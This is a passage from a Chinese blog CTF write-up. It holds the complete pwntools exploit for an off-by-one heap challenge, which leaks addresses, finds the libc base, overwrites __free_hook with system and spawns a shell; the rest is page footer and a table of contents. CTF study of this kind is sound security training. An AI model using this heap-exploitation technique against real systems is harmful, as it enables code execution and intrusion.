</span></span><span class="line"><span class="cl">        <span class="n">book_author</span> <span class="o">=</span> <span class="n">io</span><span class="o">.</span><span class="n">readline</span><span class="p">()[:</span><span class="o">-</span><span class="mi">1</span><span class="p">]</span>
</span></span><span class="line"><span class="cl">    <span class="k">return</span> <span class="n">book_id</span><span class="p">,</span> <span class="n">book_name</span><span class="p">,</span> <span class="n">book_des</span><span class="p">,</span> <span class="n">book_author</span>
</span></span><span class="line"><span class="cl">
</span></span><span class="line"><span class="cl"><span class="k">def</span> <span class="nf">changeauthor</span><span class="p">(</span><span class="n">authorname</span><span class="p">):</span>
</span></span><span class="line"><span class="cl">    <span class="n">io</span><span class="o">.</span><span class="n">readuntil</span><span class="p">(</span><span class="s2">&#34;&gt; &#34;</span><span class="p">)</span>
</span></span><span class="line"><span class="cl">    <span class="n">io</span><span class="o">.</span><span class="n">sendline</span><span class="p">(</span><span class="s2">&#34;5&#34;</span><span class="p">)</span>
</span></span><span class="line"><span class="cl">    <span class="n">io</span><span class="o">.</span><span class="n">readuntil</span><span class="p">(</span><span class="s2">&#34;: &#34;</span><span class="p">)</span>
</span></span><span class="line"><span class="cl">    <span class="n">io</span><span class="o">.</span><span class="n">sendline</span><span class="p">(</span><span class="n">authorname</span><span class="p">)</span>
</span></span><span class="line"><span class="cl">
</span></span><span class="line"><span class="cl"><span class="n">io</span><span class="o">.</span><span class="n">recvuntil</span><span class="p">(</span><span class="s2">&#34;author name:&#34;</span><span class="p">)</span>
</span></span><span class="line"><span class="cl"><span class="n">io</span><span class="o">.</span><span class="n">sendline</span><span class="p">(</span><span class="s2">&#34;a&#34;</span> <span class="o">*</span> <span class="mi">30</span> <span class="o">+</span> <span class="s2">&#34;bc&#34;</span><span class="p">)</span>
</span></span><span class="line"><span class="cl"><span class="n">createbook</span><span class="p">(</span><span class="mi">140</span><span class="p">,</span><span class="s2">&#34;kkbook1&#34;</span><span class="p">,</span><span class="mi">250</span><span class="p">,</span><span class="s2">&#34;haha&#34;</span><span class="p">)</span>
</span></span><span class="line"><span class="cl"><span class="n">book1_id</span><span class="p">,</span><span class="n">book1_name</span><span class="p">,</span><span class="n">book1_des</span><span class="p">,</span><span class="n">book_author</span> <span class="o">=</span> <span class="n">printbook</span><span class="p">(</span><span class="mi">1</span><span class="p">)</span>
</span></span><span class="line"><span class="cl"><span class="n">book1_addr</span> <span class="o">=</span> <span class="n">u64</span><span class="p">(</span><span class="n">book_author</span><span class="p">[</span><span class="mi">32</span><span class="p">:</span><span class="mi">32</span><span class="o">+</span><span class="mi">6</span><span class="p">]</span><span class="o">.</span><span class="n">ljust</span><span class="p">(</span><span class="mi">8</span><span class="p">,</span><span class="sa">b</span><span class="s1">&#39;</span><span class="se">\x00</span><span class="s1">&#39;</span><span class="p">))</span>
</span></span><span class="line"><span class="cl"><span class="nb">print</span><span class="p">(</span><span class="s2">&#34;book1_addr --&gt;&#34;</span><span class="o">+</span><span class="nb">hex</span><span class="p">(</span><span class="n">book1_addr</span><span class="p">))</span>
</span></span><span class="line"><span class="cl"><span class="c1">#print(&#34;book1_addr --&gt; 0x%x&#34;%book1_addr)</span>
</span></span><span class="line"><span class="cl"><span class="c1">#payload = b&#34;a&#34;*176 + p64(0x01) + p64(book1_addr + 0x38)*2 + p64(0xffff)</span>
</span></span><span class="line"><span class="cl"><span class="n">payload</span> <span class="o">=</span> <span class="sa">b</span><span class="s2">&#34;a&#34;</span><span class="o">*</span><span class="mi">176</span> <span class="o">+</span> <span class="n">p64</span><span class="p">(</span><span class="mh">0x01</span><span class="p">)</span> <span class="o">+</span> <span class="n">p64</span><span class="p">(</span><span class="n">book1_addr</span> <span class="o">+</span> <span class="mh">0x40</span><span class="p">)</span><span class="o">*</span><span class="mi">2</span> <span class="o">+</span> <span class="n">p64</span><span class="p">(</span><span class="mh">0xffff</span><span class="p">)</span>
</span></span><span class="line"><span class="cl"><span class="n">editbook</span><span class="p">(</span><span class="mi">1</span><span class="p">,</span><span class="n">payload</span><span class="p">)</span> <span class="c1">#fake_book1</span>
</span></span><span class="line"><span class="cl"><span class="n">createbook</span><span class="p">(</span><span class="mh">0x21000</span><span class="p">,</span><span class="s2">&#34;/bin/sh&#34;</span><span class="p">,</span><span class="mh">0x21000</span><span class="p">,</span><span class="s2">&#34;/bin/sh&#34;</span><span class="p">)</span>
</span></span><span class="line"><span class="cl"><span class="n">changeauthor</span><span class="p">(</span><span class="s2">&#34;a&#34;</span><span class="o">*</span><span class="mi">30</span> <span class="o">+</span> <span class="s2">&#34;00&#34;</span><span class="p">)</span>
</span></span><span class="line"><span class="cl"><span class="n">book_id</span><span class="p">,</span> <span class="n">book_name</span><span class="p">,</span> <span class="n">book_des</span><span class="p">,</span> <span class="n">book_author</span> <span class="o">=</span> <span class="n">printbook</span><span class="p">(</span><span class="mi">1</span><span class="p">)</span>
</span></span><span class="line"><span class="cl"><span class="n">book2_des</span> <span class="o">=</span> <span class="n">u64</span><span class="p">(</span><span class="n">book_des</span><span class="o">.</span><span class="n">ljust</span><span class="p">(</span><span class="mi">8</span><span class="p">,</span><span class="sa">b</span><span class="s1">&#39;</span><span class="se">\x00</span><span class="s1">&#39;</span><span class="p">))</span>
</span></span><span class="line"><span class="cl"><span class="n">book2_name</span> <span class="o">=</span> <span class="n">book2_des</span> <span class="o">+</span> <span class="mh">0x22000</span>
</span></span><span class="line"><span class="cl"><span class="nb">print</span><span class="p">(</span><span class="s2">&#34;book2_des_addr --&gt;&#34;</span> <span class="o">+</span> <span class="nb">hex</span><span class="p">(</span><span class="n">book2_des</span><span class="p">))</span>
</span></span><span class="line"><span class="cl"><span class="nb">print</span><span class="p">(</span><span class="s2">&#34;book2_name_addr --&gt;&#34;</span> <span class="o">+</span> <span class="nb">hex</span><span class="p">(</span><span class="n">book2_name</span><span class="p">))</span>
</span></span><span class="line"><span class="cl"><span class="n">libc_base</span> <span class="o">=</span> <span class="n">book2_name</span> <span class="o">+</span> <span class="mh">0x21ff0</span>
</span></span><span class="line"><span class="cl"><span class="nb">print</span><span class="p">(</span><span class="s2">&#34;libc_base_addr --&gt;&#34;</span> <span class="o">+</span> <span class="nb">hex</span><span class="p">(</span><span class="n">libc_base</span><span class="p">))</span>
</span></span><span class="line"><span class="cl"><span class="c1">#gdb.attach(io)</span>
</span></span><span class="line"><span class="cl"><span class="n">system</span><span class="o">=</span><span class="n">libc_base</span><span class="o">+</span><span class="n">libc</span><span class="o">.</span><span class="n">symbols</span><span class="p">[</span><span class="s1">&#39;system&#39;</span><span class="p">]</span>
</span></span><span class="line"><span class="cl"><span class="n">free_hook</span><span class="o">=</span><span class="n">libc_base</span><span class="o">+</span><span class="n">libc</span><span class="o">.</span><span class="n">symbols</span><span class="p">[</span><span class="s1">&#39;__free_hook&#39;</span><span class="p">]</span>
</span></span><span class="line"><span class="cl"><span class="nb">print</span><span class="p">(</span><span class="s2">&#34;free_hook_addr --&gt;&#34;</span> <span class="o">+</span> <span class="nb">hex</span><span class="p">(</span><span class="n">free_hook</span><span class="p">))</span>
</span></span><span class="line"><span class="cl"><span class="nb">print</span><span class="p">(</span><span class="s2">&#34;system_addr --&gt;&#34;</span> <span class="o">+</span> <span class="nb">hex</span><span class="p">(</span><span class="n">system</span><span class="p">))</span>
</span></span><span class="line"><span class="cl"><span class="n">payload</span><span class="o">=</span><span class="n">p64</span><span class="p">(</span><span class="n">free_hook</span><span class="p">)</span>
</span></span><span class="line"><span class="cl"><span class="n">editbook</span><span class="p">(</span><span class="mi">1</span><span class="p">,</span> <span class="n">payload</span><span class="p">)</span>
</span></span><span class="line"><span class="cl"><span class="n">payload</span><span class="o">=</span><span class="n">p64</span><span class="p">(</span><span class="n">system</span><span class="p">)</span>
</span></span><span class="line"><span class="cl"><span class="n">editbook</span><span class="p">(</span><span class="mi">2</span><span class="p">,</span> <span class="n">payload</span><span class="p">)</span>
</span></span><span class="line"><span class="cl"><span class="n">deletebook</span><span class="p">(</span><span class="mi">2</span><span class="p">)</span>
</span></span><span class="line"><span class="cl"><span class="n">io</span><span class="o">.</span><span class="n">interactive</span><span class="p">()</span>
</span></span></code></pre></td></tr></table>
</div>
</div><p>由于该题使用的是本地的glibc，使用的是libc-3.3所以只适合于本地调试getshell，远程需要在本地连接相同的ld和libc文件，进行调试。</p>

</section>


    <footer class="article-footer">
    

    
    <section class="article-copyright">
        <svg xmlns="http://www.w3.org/2000/svg" class="icon icon-tabler icon-tabler-copyright" width="24" height="24" viewBox="0 0 24 24" stroke-width="2" stroke="currentColor" fill="none" stroke-linecap="round" stroke-linejoin="round">
  <path stroke="none" d="M0 0h24v24H0z"/>
  <circle cx="12" cy="12" r="9" />
  <path d="M14.5 9a3.5 4 0 1 0 0 6" />
</svg>



        <span>Licensed under CC BY-NC-SA 4.0</span>
    </section>
    </footer>


    
</article>

    

    

     
    
        
    <script src='//unpkg.com/@waline/client@v2/dist/waline.js'></script>
<link href='//unpkg.com/@waline/client@v2/dist/waline.css' rel='stylesheet'/>
<div id="waline" class="waline-container"></div>
<style>
    .waline-container {
        background-color: var(--card-background);
        border-radius: var(--card-border-radius);
        box-shadow: var(--shadow-l1);
        padding: var(--card-padding);
        --waline-font-size: var(--article-font-size);
    }
    .waline-container .wl-count {
        color: var(--card-text-color-main);
    }
</style><script>
    
    Waline.init({"dark":"html[data-scheme=\"dark\"]","el":"#waline","emoji":["https://unpkg.com/@waline/emojis@1.0.1/weibo"],"locale":{"admin":"Admin","placeholder":null},"requiredMeta":["name","email","url"],"serverURL":"https://blog-waline-ox87ky1di-j-shiro.vercel.app/"});
</script>

    

    <footer class="site-footer">
    <section class="copyright">
        &copy; 
        
            2020 - 
        
        2022 J-shiro&#39;s 博客<br />
        
        
            
        
            
        
            
        
            
        
            
        
            
        
            
        
            
        
            
        
        共 8.39k 字 · 共 5篇文章
        <script async src="//busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js"></script>

            <br />本站访客数<span id="busuanzi_value_site_uv"></span>人次---
            <span id="busuanzi_container_site_pv"> 总访问量<span id="busuanzi_value_site_pv"></span>次 </span>---
            <span id="busuanzi_container_page_pv">本文阅读量<span id="busuanzi_value_page_pv"></span>次</span>    
    </section>
    
    <section class="powerby">
        Built with <a href="https://gohugo.io/" target="_blank" rel="noopener">Hugo</a> <br />
        主题 <b><a href="https://github.com/CaiJimmy/hugo-theme-stack" target="_blank" rel="noopener" data-version="3.13.0">Stack</a></b> 由 <a href="https://jimmycai.com" target="_blank" rel="noopener">Jimmy</a> 设计
    </section>

</footer>


    
<div class="pswp" tabindex="-1" role="dialog" aria-hidden="true">

    
    <div class="pswp__bg"></div>

    
    <div class="pswp__scroll-wrap">

        
        <div class="pswp__container">
            <div class="pswp__item"></div>
            <div class="pswp__item"></div>
            <div class="pswp__item"></div>
        </div>

        
        <div class="pswp__ui pswp__ui--hidden">

            <div class="pswp__top-bar">

                

                <div class="pswp__counter"></div>

                <button class="pswp__button pswp__button--close" title="Close (Esc)"></button>

                <button class="pswp__button pswp__button--share" title="Share"></button>

                <button class="pswp__button pswp__button--fs" title="Toggle fullscreen"></button>

                <button class="pswp__button pswp__button--zoom" title="Zoom in/out"></button>

                
                
                <div class="pswp__preloader">
                    <div class="pswp__preloader__icn">
                        <div class="pswp__preloader__cut">
                            <div class="pswp__preloader__donut"></div>
                        </div>
                    </div>
                </div>
            </div>

            <div class="pswp__share-modal pswp__share-modal--hidden pswp__single-tap">
                <div class="pswp__share-tooltip"></div>
            </div>

            <button class="pswp__button pswp__button--arrow--left" title="Previous (arrow left)">
            </button>

            <button class="pswp__button pswp__button--arrow--right" title="Next (arrow right)">
            </button>

            <div class="pswp__caption">
                <div class="pswp__caption__center"></div>
            </div>

        </div>

    </div>

</div><script 
                src="https://cdn.jsdelivr.net/npm/photoswipe@4.1.3/dist/photoswipe.min.js"integrity="sha256-ePwmChbbvXbsO02lbM3HoHbSHTHFAeChekF1xKJdleo="crossorigin="anonymous"
                defer
                >
            </script><script 
                src="https://cdn.jsdelivr.net/npm/photoswipe@4.1.3/dist/photoswipe-ui-default.min.js"integrity="sha256-UKkzOn/w1mBxRmLLGrSeyB4e1xbrp4xylgAWb3M42pU="crossorigin="anonymous"
                defer
                >
            </script><link 
                rel="stylesheet" 
                href="https://cdn.jsdelivr.net/npm/photoswipe@4.1.3/dist/default-skin/default-skin.min.css"crossorigin="anonymous"
            ><link 
                rel="stylesheet" 
                href="https://cdn.jsdelivr.net/npm/photoswipe@4.1.3/dist/photoswipe.min.css"crossorigin="anonymous"
            >

    <div id="backTop" onclick="backTopFunction()" style="right: 40px; bottom: 40px; display: flex;">
        <svg xmlns="http://www.w3.org/2000/svg" height="30" width="20" viewBox="0 0 512 512"><title>Caret Up</title>
            <path d="M414 321.94L274.22 158.82a24 24 0 00-36.44 0L98 321.94c-13.34 15.57-2.28 39.62 18.22 39.62h279.6c20.5 0 31.56-24.05 18.18-39.62z" fill="#adb5bd"></path>
        </svg>
        <style type="text/css">
            #backTop {
                position: fixed;
                background-color: #fff;
                width: 40px;
                height: 40px;
                border-radius: 50%;
                display: none;
                align-items: center;
                justify-content: center;
                box-shadow: 0 0 6px rgba(0,0,0,.12);
                cursor: pointer;
                z-index: 5;
            }
    
            #backTop:hover {
                background-color: #f1f4f8;
            }
        </style>
        <script>
    
            window.onscroll = function() {scrollFunction()};
    
            function scrollFunction() {console.log(121);
                if (document.body.scrollTop > 20 || document.documentElement.scrollTop > 20) {
                    document.getElementById("backTop").style.display = "flex";
                } else {
                    document.getElementById("backTop").style.display = "none";
                }
            }
    
    
            function backTopFunction() {
                document.body.scrollTop = 0;
                document.documentElement.scrollTop = 0;
            }
        </script>
    </div>
    


            </main>
    <aside class="sidebar right-sidebar sticky">
        
            
                
    <section class="widget archives">
        <div class="widget-icon">
            <svg xmlns="http://www.w3.org/2000/svg" class="icon icon-tabler icon-tabler-hash" width="24" height="24" viewBox="0 0 24 24" stroke-width="2" stroke="currentColor" fill="none" stroke-linecap="round" stroke-linejoin="round">
  <path stroke="none" d="M0 0h24v24H0z"/>
  <line x1="5" y1="9" x2="19" y2="9" />
  <line x1="5" y1="15" x2="19" y2="15" />
  <line x1="11" y1="4" x2="7" y2="20" />
  <line x1="17" y1="4" x2="13" y2="20" />
</svg>



        </div>
        <h2 class="widget-title section-title">目录</h2>
        
        <div class="widget--toc">
            <nav id="TableOfContents">
  <ol>
    <li><a href="#分析功能及数据结构">分析功能及数据结构</a>
      <ol>
        <li><a href="#main">main</a></li>
        <li><a href="#sub_a77">sub_A77</a></li>
        <li><a href="#sub_b6d">sub_B6D</a></li>
        <li><a href="#sub_9f5">sub_9F5</a></li>
        <li><a href="#sub_a89">sub_A89</a></li>
        <li><a href="#sub_f55">sub_F55</a></li>
        <li><a href="#sub_b24">sub_B24</a></li>
        <li><a href="#sub_bbd">sub_BBD</a></li>
        <li><a href="#sub_e17">sub_E17</a></li>
        <li><a href="#sub_d1f">sub_D1F</a></li>
        <li><a href="#sub_b6d-1">sub_B6D</a></li>
      </ol>
    </li>
    <li><a href="#off-by-one">Off by one</a></li>
    <li><a href="#实践exp">实践exp</a>
      <ol>
        <li><a href="#peda的find插件进行分析">peda的find插件进行分析</a></li>
        <li><a href="#利用技巧与思路">利用技巧与思路</a></li>
        <li><a href="#基本函数定义">基本函数定义</a></li>
        <li><a href="#创建book1">创建book1</a></li>
        <li><a href="#print得book1地址">print得book1地址</a></li>
        <li><a href="#构造fake_book1">构造fake_book1</a></li>
        <li><a href="#创建book2修改author_name">创建book2，修改author_name</a></li>
        <li><a href="#输出book1得到book2_description地址">输出book1得到book2_description地址</a></li>
        <li><a href="#泄露得到libc地址">泄露得到libc地址</a></li>
        <li><a href="#获得system和free_hook地址">获得system和free_hook地址</a></li>
        <li><a href="#getshell">Getshell</a></li>
      </ol>
    </li>
    <li><a href="#完整exp如下">完整exp如下</a></li>
  </ol>
</nav>
        </div>
    </section>

            
        
    </aside>


        </div>
        <script 
                src="https://cdn.jsdelivr.net/npm/node-vibrant@3.1.6/dist/vibrant.min.js"integrity="sha256-awcR2jno4kI5X0zL8ex0vi2z&#43;KMkF24hUW8WePSA9HM="crossorigin="anonymous"
                
                >
            </script><script type="text/javascript" src="/ts/main.js" defer></script>
<script>
    (function () {
        const customFont = document.createElement('link');
        customFont.href = "https://fonts.googleapis.com/css2?family=Lato:wght@300;400;700&display=swap";

        customFont.type = "text/css";
        customFont.rel = "stylesheet";

        document.head.appendChild(customFont);

    }());
</script>

<script
    src="https://cdn.jsdelivr.net/gh/zhixuan2333/gh-blog@v0.1.0/js/nprogress.min.js"
    integrity="sha384-bHDlAEUFxsRI7JfULv3DTpL2IXbbgn4JHQJibgo5iiXSK6Iu8muwqHANhun74Cqg"
    crossorigin="anonymous"
></script>
<link
    rel="stylesheet"
    href="https://cdn.jsdelivr.net/gh/zhixuan2333/gh-blog@v0.1.0/css/nprogress.css"
    integrity="sha384-KJyhr2syt5+4M9Pz5dipCvTrtvOmLk/olWVdfhAp858UCa64Ia5GFpTN7+G4BWpE"
    crossorigin="anonymous"
/>
<script>
    NProgress.start();
    document.addEventListener("readystatechange", () => {
        if (document.readyState === "interactive") NProgress.inc(0.8);
        if (document.readyState === "complete") NProgress.done();
    });
</script>

    </body>
</html>
